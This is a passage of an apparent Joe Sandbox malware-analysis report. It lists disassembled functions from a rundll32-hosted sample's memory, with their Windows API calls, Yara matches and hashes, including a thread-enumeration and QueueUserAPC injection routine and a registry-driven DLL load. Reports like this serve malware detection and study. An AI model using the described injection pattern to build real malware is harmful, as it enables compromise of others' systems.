                                            • Part of subcall function 00B63672: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B636D4
                                            • Part of subcall function 00B63672: CloseHandle.KERNEL32(?), ref: 00B636DD
                                          • GetLastError.KERNEL32 ref: 00B6BFA9
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B6BFB9
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B6BFCA
                                          • RtlExitUserThread.NTDLL(?), ref: 00B6BFD8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                          • String ID:
                                          • API String ID: 1258333524-0
                                          • Opcode ID: b2fb73cb9505ab494fc7a7f788256b1f1b0bfdcbc17f011ceffa97dfe498c5b5
                                          • Instruction ID: c85de7350e958fb9927aa34a61c34d666254fcf3ae227f2db6b85a15e53508bb
                                          • Opcode Fuzzy Hash: b2fb73cb9505ab494fc7a7f788256b1f1b0bfdcbc17f011ceffa97dfe498c5b5
                                          • Instruction Fuzzy Hash: EAB107B1500249EFEB309F61CC88EAA7BF9FF08305F1045A9FA5AD2160EB759995CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5C49E Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(0614C1E8,00000000,00000000,00000000,?), ref: 00B5C4C1
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C4D0
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C4DD
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00B5C4F5
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C501
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5C51D
                                          • wsprintfA.USER32 ref: 00B5C5FF
                                          • memcpy.NTDLL(00000000,00004000,?), ref: 00B5C64C
                                          • InterlockedExchange.KERNEL32(00B79148,00000000), ref: 00B5C66A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5C6AB
                                            • Part of subcall function 00B6C301: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6C32A
                                            • Part of subcall function 00B6C301: memcpy.NTDLL(00000000,?,?), ref: 00B6C33D
                                            • Part of subcall function 00B6C301: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6C34E
                                            • Part of subcall function 00B6C301: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6C363
                                            • Part of subcall function 00B6C301: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6C39B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                          • String ID:
                                          • API String ID: 4198405257-0
                                          • Opcode ID: 3c325e88b6b03b4d2c34ef8772f14a3928a938862ae15819f5897b523a411510
                                          • Instruction ID: b47f7c4a0971ad25990480866c4bdbe752ae591c6d611d5e1c14237ab1ad4d9c
                                          • Opcode Fuzzy Hash: 3c325e88b6b03b4d2c34ef8772f14a3928a938862ae15819f5897b523a411510
                                          • Instruction Fuzzy Hash: 47615C7190020AEFDF10DFA5DC85EAE7BFAEB48301F0584A9F809E7250DB709A58CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5BD6D Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00B5BD7D
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00B79208,00000003,00000000,00000000,?,?,00000000), ref: 00B5BD9A
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00B5BE42
                                            • Part of subcall function 00B69C23: lstrlen.KERNEL32(?,00000000,?,00000027,00B79208,?,00000000,?,?,?,?,?,00B5BDC2,?,00000001), ref: 00B69C59
                                            • Part of subcall function 00B69C23: lstrcpy.KERNEL32(00000000,00000000), ref: 00B69C7D
                                            • Part of subcall function 00B69C23: lstrcat.KERNEL32(00000000,00000000), ref: 00B69C85
                                          • GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 00B5BDCD
                                          • CreateFileMappingA.KERNEL32(00000000,00B79208,00000002,00000000,00000000,?), ref: 00B5BDE1
                                          • lstrlen.KERNEL32(?,?,?,00000000), ref: 00B5BDFD
                                          • lstrcpy.KERNEL32(?,?), ref: 00B5BE0D
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00B5BE15
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00B5BE28
                                          • CloseHandle.KERNEL32(?,?), ref: 00B5BE3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                          • String ID:
                                          • API String ID: 194907169-0
                                          • Opcode ID: 62addc5bba83ce87a34fd273f46842b0141913d8e6e3d6db7333181157ba414e
                                          • Instruction ID: 60d0590bc3b95b7ba25edfd69013a43317b9e79380e2851ee83bd767c5be2783
                                          • Opcode Fuzzy Hash: 62addc5bba83ce87a34fd273f46842b0141913d8e6e3d6db7333181157ba414e
                                          • Instruction Fuzzy Hash: B2211E71800208FFDB109FA4DC89E9D7FB9FB04356F1084A9FA1AE3260D7715A94DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B55DA0 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(?), ref: 00B55DC6
                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B55DD2
                                          • GetModuleHandleA.KERNEL32(?,0614978E), ref: 00B55DF2
                                          • GetProcAddress.KERNEL32(00000000), ref: 00B55DF9
                                          • Thread32First.KERNEL32(?,0000001C), ref: 00B55E09
                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 00B55E24
                                          • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 00B55E35
                                          • CloseHandle.KERNEL32(00000000), ref: 00B55E3C
                                          • Thread32Next.KERNEL32(?,0000001C), ref: 00B55E45
                                          • CloseHandle.KERNEL32(?), ref: 00B55E51
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                          • String ID:
                                          • API String ID: 2341152533-0
                                          • Opcode ID: 1ca0ae6a6b8b1b7a64455d4eb3c6f4c1b64173ab225a5c1bd7f2a9ac887af986
                                          • Instruction ID: de1723f58cd53819f8ff9ee26dfca565e49c8051205d17da32522e058eead5a8
                                          • Opcode Fuzzy Hash: 1ca0ae6a6b8b1b7a64455d4eb3c6f4c1b64173ab225a5c1bd7f2a9ac887af986
                                          • Instruction Fuzzy Hash: 1B21607250010CFFDF11AFE4DC89DAE7BB9EF48352B0040A5FA19A7160DB319E998B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5608A Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(?,?,00B6F846), ref: 00B5609F
                                            • Part of subcall function 00B6FDDB: InterlockedExchange.KERNEL32(00B65593,000000FF), ref: 00B6FDE2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B6F846), ref: 00B560BF
                                          • CloseHandle.KERNEL32(00000000,?,00B6F846), ref: 00B560C8
                                          • CloseHandle.KERNEL32(00000000,?,?,00B6F846), ref: 00B560D2
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B560DA
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B560F2
                                          • Sleep.KERNEL32(000001F4), ref: 00B56101
                                          • CloseHandle.KERNEL32(?), ref: 00B5610E
                                          • LocalFree.KERNEL32(?), ref: 00B56119
                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00B56123
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 1408595562-0
                                          • Opcode ID: 60f826fac53879627418c3b04196fdad3f4e2ac45e9466222cbbe0ab131745f3
                                          • Instruction ID: 7b709a0efa43a8e04b891ec5858624f7d680676a263287dd510bedb50e08b8a8
                                          • Opcode Fuzzy Hash: 60f826fac53879627418c3b04196fdad3f4e2ac45e9466222cbbe0ab131745f3
                                          • Instruction Fuzzy Hash: EE115E31100716DFCB306B65DC89A5ABBF8FF0471775549A5FA86935A1CF35E8888B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B53810 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,00B5D2C5,00000000,00000001,?,?,?), ref: 00B53827
                                          • lstrlen.KERNEL32(?), ref: 00B53837
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B5386B
                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00B53896
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B538B5
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B53916
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00B53938
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                          • String ID: W
                                          • API String ID: 3204852930-655174618
                                          • Opcode ID: acc6f76eac1bf9c2af5c15386089fceb45b9b180d8f0321df0398e7a81371617
                                          • Instruction ID: 3588df4ee261c8c942fd5c240452b755f0e96e6cdd11a71cbc3731d990564e07
                                          • Opcode Fuzzy Hash: acc6f76eac1bf9c2af5c15386089fceb45b9b180d8f0321df0398e7a81371617
                                          • Instruction Fuzzy Hash: 40414AB190020AEFDF118F95CC84AAE7BF9EF04785F1484A5FD09A7211E7709A989B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B62ACE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B5F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                            • Part of subcall function 00B5F123: lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 00B62B1A
                                          • wsprintfA.USER32 ref: 00B62B48
                                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00B62BA6
                                          • GetLastError.KERNEL32 ref: 00B62BBD
                                          • ResetEvent.KERNEL32(?), ref: 00B62BD1
                                          • ResetEvent.KERNEL32(?), ref: 00B62BD6
                                          • GetLastError.KERNEL32 ref: 00B62BEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                          • String ID: `
                                          • API String ID: 2276693960-1850852036
                                          • Opcode ID: 7b881df7d17badfeb9c41509194adf81c158cbc5b86c7688ef8f99033faa04ad
                                          • Instruction ID: 4045b89ced6568ece54b276c377befedcb6f55998fc3d8b16cfca7fed65771ca
                                          • Opcode Fuzzy Hash: 7b881df7d17badfeb9c41509194adf81c158cbc5b86c7688ef8f99033faa04ad
                                          • Instruction Fuzzy Hash: 0E41AC7140060AEFEB11DFA4CC49BAEBBF8FF14305F0044A5F905A2260DB759A64CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B53622 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                          • memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                          • GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                          • String ID: (
                                          • API String ID: 2237239663-3887548279
                                          • Opcode ID: 6dff0d70f5a3383a398f7cbed38ecae0a1f9246d3b4201716bc43d93e6f5b64b
                                          • Instruction ID: bb8b2a96b0390e7b9e92e420c508c58c18d54274f27b763894c38399f1f640cc
                                          • Opcode Fuzzy Hash: 6dff0d70f5a3383a398f7cbed38ecae0a1f9246d3b4201716bc43d93e6f5b64b
                                          • Instruction Fuzzy Hash: 61318076900209FFDB218FA4DC84A9B7BF8EB44751F144469FE0AD3350D7309A98DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56778 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00B56793
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00B5684B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 00B567E1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B567FA
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B56819
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 00B5682B
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B56833
                                          Strings
                                          • Software\Microsoft\WAB\DLLPath, xrefs: 00B56784
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                          • String ID: Software\Microsoft\WAB\DLLPath
                                          • API String ID: 1628847533-3156921957
                                          • Opcode ID: 46ecac277e47fb854e0f316583a7c8dd5b3999834b2bd4b3264053026aa7cd08
                                          • Instruction ID: 6964fa5b3817a66d243dff8e0d1e950e7035a036bb5217f1c6eb61d84f7d0429
                                          • Opcode Fuzzy Hash: 46ecac277e47fb854e0f316583a7c8dd5b3999834b2bd4b3264053026aa7cd08
                                          • Instruction Fuzzy Hash: AB217F72900118FFCB21ABA4DC88EAEBFF8EB54316B5501E6FD19A3120DB714E84DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A2FF Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B6A340
                                          • memset.NTDLL ref: 00B6A354
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • GetCurrentThreadId.KERNEL32 ref: 00B6A3E1
                                          • GetCurrentThread.KERNEL32 ref: 00B6A3F4
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B6A49B
                                          • Sleep.KERNEL32(0000000A), ref: 00B6A4A5
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B6A4CB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6A4F9
                                          • HeapFree.KERNEL32(00000000,00000018), ref: 00B6A50C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                          • String ID:
                                          • API String ID: 1146182784-0
                                          • Opcode ID: d22db0437b16206ae26a7a71149b9e4dd4bc8b89e50a43a9207db3a7b080f334
                                          • Instruction ID: fc454c25b63405703d74e2d115135c0cabbb35c6a8997b7ccb966dbc9d641907
                                          • Opcode Fuzzy Hash: d22db0437b16206ae26a7a71149b9e4dd4bc8b89e50a43a9207db3a7b080f334
                                          • Instruction Fuzzy Hash: B25109B1508205AFEB10EF64DC8495ABBE8FB48310F004D6DF989E7261DB35DD898F92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B60682 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 00B606BF
                                          • memset.NTDLL ref: 00B606D0
                                          • lstrcmpi.KERNEL32(?,?), ref: 00B60710
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6073C
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B60750
                                          • memset.NTDLL ref: 00B6075D
                                          • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 00B60776
                                          • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 00B60799
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B607B6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                          • String ID:
                                          • API String ID: 694413484-0
                                          • Opcode ID: 32ec22ff3933389db83955c7aff2ae47c2b10f22b821cddb7261cc5313d0f969
                                          • Instruction ID: 2ebd6fce3ee7376c9051f5d4ab1f920de9c796b3aa8e0c6527c17f71b1c7b85a
                                          • Opcode Fuzzy Hash: 32ec22ff3933389db83955c7aff2ae47c2b10f22b821cddb7261cc5313d0f969
                                          • Instruction Fuzzy Hash: F241A072E10209AFDB10AFA5DC84B9E7BF9EF04314F1044A9E509A7260EB39AE55CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B678F5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6790C
                                          • lstrlen.KERNEL32(?), ref: 00B67914
                                          • lstrlen.KERNEL32(?), ref: 00B6797F
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B679AA
                                          • memcpy.NTDLL(00000000,00000002,?), ref: 00B679BB
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B679D1
                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00B679E3
                                          • memcpy.NTDLL(00000000,00B743E8,00000002,00000000,?,?,00000000,?,?), ref: 00B679F6
                                          • memcpy.NTDLL(00000000,?,00000002), ref: 00B67A0B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$lstrlen$AllocateHeap
                                          • String ID:
                                          • API String ID: 3386453358-0
                                          • Opcode ID: a0bcbd9e1c3cda8acd61c5d44f296687e482fb3d154f800b3ff5e978aef0b5f8
                                          • Instruction ID: 1818d0f4d690693cd84cf1b3d62bbe4b7337e8778d4244fc8cd21914076e5d38
                                          • Opcode Fuzzy Hash: a0bcbd9e1c3cda8acd61c5d44f296687e482fb3d154f800b3ff5e978aef0b5f8
                                          • Instruction Fuzzy Hash: D3412B72D0021AFBCF01DFE8CC8199EBBF9EF48318F144496E909A3251EB359A50DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B845 Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,00B579C7,00000000), ref: 00B6B896
                                          • lstrlen.KERNEL32(00000008,?,?,?,00B579C7,00000000), ref: 00B6B8A5
                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00B6B8B7
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00B579C7,00000000), ref: 00B6B8C7
                                          • memcpy.NTDLL(00000000,00000000,00B579C7,?,?,?,00B579C7,00000000), ref: 00B6B8D9
                                          • lstrcpy.KERNEL32(00000020), ref: 00B6B90B
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6B917
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6B96F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3746371830-0
                                          • Opcode ID: dfa86452fcc075c42a39938d34850d9cc4b389dbf84f9d7813395f83431ab5ac
                                          • Instruction ID: 99ee92c84b8ba4fe9c48dadbc782cea42b95dd80838fb3258997d0638a2052c5
                                          • Opcode Fuzzy Hash: dfa86452fcc075c42a39938d34850d9cc4b389dbf84f9d7813395f83431ab5ac
                                          • Instruction Fuzzy Hash: 1E4165B1900705EFCB218F68DC84B5ABBF8FB08315F108599EA49D7261DB78D994CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5156E Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5A689: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B5A6BB
                                            • Part of subcall function 00B5A689: HeapFree.KERNEL32(00000000,00000000,?,?,00B5158A,?,00000022,00000000,00000000,00000000,?,?), ref: 00B5A6E0
                                            • Part of subcall function 00B52CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00B515AB,?,?,?,?,?,00000022,00000000,00000000), ref: 00B52CF9
                                            • Part of subcall function 00B52CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00B515AB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00B52D4C
                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B515E0
                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B515E8
                                          • lstrlen.KERNEL32(?), ref: 00B515F2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B51607
                                          • wsprintfA.USER32 ref: 00B51643
                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 00B51662
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B51677
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B51684
                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B51692
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                          • String ID:
                                          • API String ID: 168057987-0
                                          • Opcode ID: 1c0cd8c09bbf4d960b45ab67ac6183feafe889e61778c92088064a1b5b9ed5e3
                                          • Instruction ID: ff4406efb93b792742a0fccde9381dbd4928099435da60cf942eacf5a80d680d
                                          • Opcode Fuzzy Hash: 1c0cd8c09bbf4d960b45ab67ac6183feafe889e61778c92088064a1b5b9ed5e3
                                          • Instruction Fuzzy Hash: 4331B031504315BFDB11AF64DC45F9BBBE8EF49711F0509AAF948E3161DB708C588B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B53486 Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                          • GetLastError.KERNEL32 ref: 00B534D0
                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                          • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                          • SetEndOfFile.KERNEL32(?), ref: 00B53562
                                          • GetLastError.KERNEL32 ref: 00B5356E
                                          • CloseHandle.KERNEL32(?), ref: 00B5357A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
